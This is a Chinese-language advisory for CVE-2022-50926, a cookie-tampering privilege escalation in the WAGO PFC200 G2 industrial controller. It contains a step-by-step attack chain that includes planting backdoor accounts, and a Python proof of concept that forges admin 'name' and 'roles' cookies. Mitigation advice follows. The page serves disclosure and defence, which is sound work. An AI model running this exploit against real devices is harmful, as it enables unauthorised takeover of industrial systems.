CVE-2022-50926: WAGO 750-8212 PFC200 G2 会话Cookie权限提升漏洞

漏洞信息

漏洞编号

CVE-2022-50926

漏洞类型

权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WAGO 750-8212 PFC200 G2 2ETH RS

漏洞概述

CVE-2022-50926是WAGO 750-8212 PFC200 G2 2ETH RS固件中的一个严重安全漏洞，CVSS评分高达9.8（严重级别）。该漏洞属于权限提升类型，存在于设备的会话管理机制中。攻击者可以通过操纵用户会话Cookie中的'name'和'roles'参数，无需任何认证即可将普通用户权限提升至管理员权限。此漏洞的严重性在于其攻击门槛极低——攻击者无需获取任何有效凭证，也不需要与用户进行任何交互，即可实现完整的系统控制。攻击成功后，攻击者将获得设备的完全控制权，可能导致机密数据泄露、系统完整性破坏以及服务可用性中断。该漏洞影响所有未修复的固件版本，建议相关用户立即采取防护措施。

技术细节

该漏洞的根本原因在于WAGO PFC200 G2设备的Web管理界面会话Cookie验证机制存在缺陷。设备在处理用户会话时，未对Cookie中的关键参数'name'和'roles'进行充分的服务器端验证。当用户登录时，服务器生成包含用户身份和权限信息的Cookie，但系统允许客户端直接修改这些敏感参数而无需重新验证。攻击者可以通过拦截并修改Cookie请求，将'roles'参数从普通用户权限修改为管理员权限，或者直接修改'name'参数冒充管理员身份。由于服务器端缺乏对这些Cookie参数完整性的校验，修改后的Cookie会被系统接受并赋予相应的权限级别。攻击者利用Burp Suite等代理工具拦截登录请求，修改Cookie参数后重放，即可绕过认证机制获得管理员访问权限。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标WAGO PFC200 G2设备，确认Web管理界面可访问，通常通过扫描内网或公网IP段发现暴露的管理端口（80/443）

STEP 2

信息收集

攻击者通过访问登录页面获取会话Cookie，观察Cookie结构并识别'name'和'roles'等关键参数

STEP 3

流量拦截

使用Burp Suite、mitmproxy等代理工具拦截正常用户的登录请求和后续认证请求，捕获原始Cookie

STEP 4

Cookie篡改

修改截获的Cookie，将'name'参数值改为'admin'或已知管理员用户名，将'roles'参数从'user'修改为'admin'或' administrator'

STEP 5

权限提升

使用修改后的Cookie发送请求访问管理后台功能，如/admin/settings、/admin/users等特权接口

STEP 6

持久化控制

成功获取管理员权限后，可进一步修改系统配置、添加后门账户、下载敏感配置或部署恶意固件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2022-50926 PoC - WAGO PFC200 G2 Cookie Privilege Escalation
# Target: WAGO 750-8212 PFC200 G2 2ETH RS

TARGET_IP = "192.168.1.100"
TARGET_URL = f"http://{TARGET_IP}"

def exploit_privilege_escalation():
    """
    Exploit CVE-2022-50926 by modifying session cookie parameters
    to escalate from regular user to admin privileges
    """
    # Step 1: Capture legitimate user session cookie
    session = requests.Session()
    
    # Step 2: Modify cookie 'roles' parameter to admin
    # Original: roles=user -> Modified: roles=admin
    modified_cookie = {
        'name': 'admin',  # Impersonate admin user
        'roles': 'admin',  # Elevate privileges
        'session_id': 'legitimate_session_id'
    }
    
    # Step 3: Send request with modified cookie
    headers = {
        'Cookie': f"name={modified_cookie['name']}; roles={modified_cookie['roles']}; session_id={modified_cookie['session_id']}"
    }
    
    response = session.get(f"{TARGET_URL}/admin/settings", headers=headers)
    
    # Step 4: Verify admin access gained
    if response.status_code == 200 and 'admin' in response.text.lower():
        print("[+] Privilege escalation successful - Admin access obtained")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    exploit_privilege_escalation()

影响范围

WAGO 750-8212 PFC200 G2 2ETH RS firmware < 修复版本

WAGO PFC200 G2 系列固件（所有未打补丁版本）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）通过网络隔离将PFC200设备置于独立管理网段，仅允许授权运维IP访问；2）配置防火墙规则阻止外部网络对设备Web管理界面的直接访问；3）使用VPN隧道进行远程管理，避免管理端口直接暴露；4）定期轮换设备管理账户密码；5）启用入侵检测系统监控异常的认证和权限变更行为；6）考虑部署Web应用防火墙（WAF）对HTTP请求进行深度检测，拦截异常的Cookie参数修改尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2022-50926
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2022-50926
3 Details https://www.cvedetails.com/cve/CVE-2022-50926/
4 VulDB https://vuldb.com/cve/CVE-2022-50926
5 Link https://www.exploit-db.com/exploits/50793
6 Link https://www.vulncheck.com/advisories/wago-pfc-g-eth-rs-privilege-escalation
7 Link https://www.wago.com